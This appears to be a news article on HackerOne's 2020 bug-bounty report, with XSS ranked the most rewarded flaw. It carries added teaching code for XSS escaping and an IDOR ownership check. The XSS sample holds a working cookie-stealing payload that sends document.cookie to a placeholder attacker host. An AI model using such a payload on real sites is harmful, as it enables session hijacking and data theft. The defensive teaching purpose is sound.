Bug-Bounty Awards Spike 26% in 2020

The most-rewarded flaw is XSS, which is among those that are relatively cheap for organizations to identify.

Cross-site scripting (XSS) remained the most impactful vulnerability and thus the one reaping the highest rewards for ethical hackers in 2020 for a second year running, according to a list of top 10 vulnerabilities released on Thursday by HackerOne.

The vulnerability — which enables attackers to inject client-side scripts into web pages viewed by other users — earned hackers $4.2 million in total bug-bounty awards in the last year, a 26-percent increase from what was paid out in 2019 for finding XSS flaws, according to the report.
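To make the injection concrete, here is a reflected-XSS pattern in a search page, shown vulnerable and then fixed with HTML output encoding. This is an added example and not code from the article or from the HackerOne report; the page template, the `escapeHtml` helper and the payload are constructed for illustration.

```javascript
// Added example (not from the article or the HackerOne report): a reflected XSS
// in a search page, vulnerable and then fixed with contextual output encoding.
// The template, the helper and the payload below are constructed for illustration.

// Encode the five characters that matter in an HTML text or attribute context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// VULNERABLE: the untrusted query string is concatenated straight into the HTML
// body, so any markup in it is rendered and any event handler in it executes
// in the browser of whoever views the page.
function renderSearchVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// FIXED: the same page with the untrusted value encoded for the HTML context.
// The browser now displays the payload as text instead of parsing it as a tag.
function renderSearchSafe(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// A crude check a hunter might script against a page: if the exact payload
// comes back unencoded in the response, the page is injectable.
function payloadSurvives(html, payload) {
  return html.includes(payload);
}

// Constructed payload: an image that fails to load and ships the document's
// cookies to an attacker-controlled host (hostname is a placeholder).
const PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Render the payload through both versions and report whether it survived.
function demo() {
  const vulnerableHtml = renderSearchVulnerable(PAYLOAD);
  const safeHtml = renderSearchSafe(PAYLOAD);
  return {
    vulnerable: payloadSurvives(vulnerableHtml, PAYLOAD), // true: tag rendered as-is
    fixed: payloadSurvives(safeHtml, PAYLOAD),            // false: tag neutralised
    safeHtml,
  };
}

console.log(demo());
```

Two caveats a practitioner would add: the encoding must match the context (a value placed inside a JavaScript block or a URL needs different treatment than one placed in HTML text), and marking session cookies `HttpOnly` keeps `document.cookie` out of reach of a payload like the one above even when escaping is missed somewhere.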

Following XSS on the ethical hacking company’s list of “Top 10 Most Impactful and Rewarded Vulnerability Types of 2020” are: Improper access control, information disclosure, server-side request forgery (SSRF), insecure direct object reference (IDOR), privilege escalation, SQL injection, improper authentication, code injection and cross-site request forgery (CSRF).

In total, organizations paid ethical hackers $23.5 million in bug bounties for all of these flaws this year, according to HackerOne, which maintains a database of 200,000 vulnerabilities found by hackers.

Attackers use XSS vulnerabilities to run script inside a victim's browser session, which lets them hijack the account (for example by stealing session cookies or tokens) and harvest personal information such as passwords, bank account numbers, credit-card data, Social Security numbers and other personally identifiable information (PII). While XSS bugs account for 18 percent of all reported vulnerabilities, ethical hackers are actually underpaid for finding them, according to HackerOne.

The average bug-bounty award for an XSS flaw is about $501, well below the $3,650 average award for a critical flaw, which lets organizations get this common bug found and fixed on the cheap, researchers noted.

Indeed, researchers found that the more common a vulnerability type is, the less ethical hackers are paid to find it, and thus the less organizations pay out to locate and mitigate it, observed HackerOne senior director of product management Miju Han.

“Finding the most common vulnerability types is inexpensive,” he said in a press statement, noting that only three of the top 10 vulnerabilities on the list — improper access control, server-side request forgery (SSRF) and information disclosure — saw their average bounty awards rise more than 10 percent over the course of the year.

This demonstrates that using ethical hackers to sniff out bugs potentially can be a more cost-effective value proposition for organizations than implementing “traditional security tools and methods, which become more expensive and cumbersome as goals change and attack surface expands,” Han said.

Of the vulnerabilities that saw their stock rise in 2020, improper access control rose from ninth place to second, and information disclosure, which held steady in third place for commonality, became more valuable on the bug-bounty market, researchers noted.

Awards for improper access control increased 134 percent year over year to slightly more than $4 million, while bug bounties for information disclosure rose 63 percent year over year.

Because access-control decisions encode business rules about who may see or change which resource, they have to be made by humans rather than derived by a tool, and the potential for errors is high, researchers said. These flaws are also nearly impossible to detect with automated scanners, since a response that hands back another user's data looks like any other successful response unless the tester knows who should own it, which makes an ethical hacker's ability to identify them more valuable, they said.
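The kind of improper access control the report ranks second, an insecure direct object reference, looks like this in an API handler. This is an added example and not code from the article or from HackerOne; the in-memory invoice table, the session shape and the response shapes are constructed for illustration.

```javascript
// Added example (not from the article or HackerOne): an insecure direct object
// reference in an invoice endpoint, vulnerable and then fixed with an ownership
// check. Invoices, sessions and response shapes are constructed for illustration.

// Constructed data: two invoices owned by two different users.
const INVOICES = new Map([
  [101, { id: 101, ownerId: "alice", total: 120.0 }],
  [102, { id: 102, ownerId: "bob", total: 89.5 }],
]);

// VULNERABLE: the handler checks that the caller is authenticated but never that
// the caller is authorized for this particular object. Any logged-in user who
// guesses or increments an id gets someone else's invoice with a normal 200.
function getInvoiceVulnerable(session, invoiceId) {
  if (!session || !session.userId) return { status: 401 };
  const invoice = INVOICES.get(Number(invoiceId));
  if (!invoice) return { status: 404 };
  return { status: 200, body: invoice };
}

// FIXED: the lookup is scoped to the caller. A foreign id is answered exactly
// like a missing one, so the endpoint also does not confirm that it exists.
function getInvoiceSafe(session, invoiceId) {
  if (!session || !session.userId) return { status: 401 };
  const invoice = INVOICES.get(Number(invoiceId));
  if (!invoice || invoice.ownerId !== session.userId) return { status: 404 };
  return { status: 200, body: invoice };
}

// The manual probe a hunter runs: log in as bob, fetch bob's own invoice, then
// fetch alice's. A scanner sees two well-formed responses and cannot tell which
// one is wrong without knowing who should own invoice 101; a human can.
function idorProbe(handler) {
  const own = handler({ userId: "bob" }, 102);
  const foreign = handler({ userId: "bob" }, 101);
  return {
    ownStatus: own.status,
    foreignStatus: foreign.status,
    leaked: foreign.status === 200, // true means bob read alice's invoice
  };
}

console.log("vulnerable:", idorProbe(getInvoiceVulnerable));
console.log("fixed:     ", idorProbe(getInvoiceSafe));
```

The design choice worth noting is that the fix filters on ownership inside the lookup rather than bolting a comparison onto the response path, and returns the same 404 for "not yours" and "does not exist"; that pattern generalises to any resource keyed by a guessable identifier.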

Indeed, even large tech companies that were historically resistant to being transparent about their products' security have warmed to the idea of rewarding ethical hackers for their work. Both Apple and ByteDance's TikTok rolled out public, award-based bug-bounty programs in the last 12 months.

Han noted that the boost in interest in ethical hacking in 2020 also has come due to the increased digitalization of organizations’ products and services due to the COVID-19 pandemic and its stay-at-home orders.

“Businesses scrambled to find new revenue streams, creating digital offerings for customers whose lifestyles had dramatically changed,” he said in the statement. “Tens of millions of workers started working remotely whether or not they were ready.”

This “accelerated pace of digital transformation” gave security leaders a new perspective on using ethical hacking to augment existing security resources, making them more willing to support a pay-for-results-based approach, Han added.